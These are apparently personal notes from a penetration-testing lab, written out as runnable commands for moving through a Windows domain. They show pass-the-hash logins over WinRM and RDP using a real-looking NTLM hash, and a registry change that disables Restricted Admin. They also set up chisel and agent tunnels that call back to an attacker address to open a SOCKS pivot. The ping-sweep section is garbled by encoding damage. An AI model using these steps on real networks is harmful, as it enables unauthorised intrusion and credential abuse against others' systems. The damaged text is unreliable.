Evil-winrm setup to get rdp
proxychains evil-winrm -i 172.16.1.5 -u 'iamtheadministrator' -H 70016778cb0524c799ac25b439bd67e0 /domain:corp.localRemoving Admins Restriction
powershell reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fRDP
proxychains xfreerdp /u:iamtheadministrator /pth:70016778cb0524c799ac25b439bd67e0 /v:172.16.1.5
./chiselj server -p 8004 --reversePowershell
set Execution-policy Unrestricted
.\chiselj.exe client 10.10.15.211:8004 R:5000:socks
.\agent.exe -connect 10.10.15.211:11601 -ignore-cert
#Disconnect
DC02 connection with proxychains
- Go to DC02 folder as the proxychains files with port 5000 is there.
Ping Sweep
�1�.�.�2�56� �|� �%� �{�"�1�7�2�.�1�6�.�2�.�$�(�$�_�)�:� �$�(�T�e�s�t�-�C�o�n�n�e�c�t�i�o�n� �-�c�o�u�n�t� �1� �-�c�o�m�p� �1�7�2�.�1�6�.�2�.�$�(�$�_�)� �-�q�u�i�e�t�)�"�}���Results
.22 is the new ip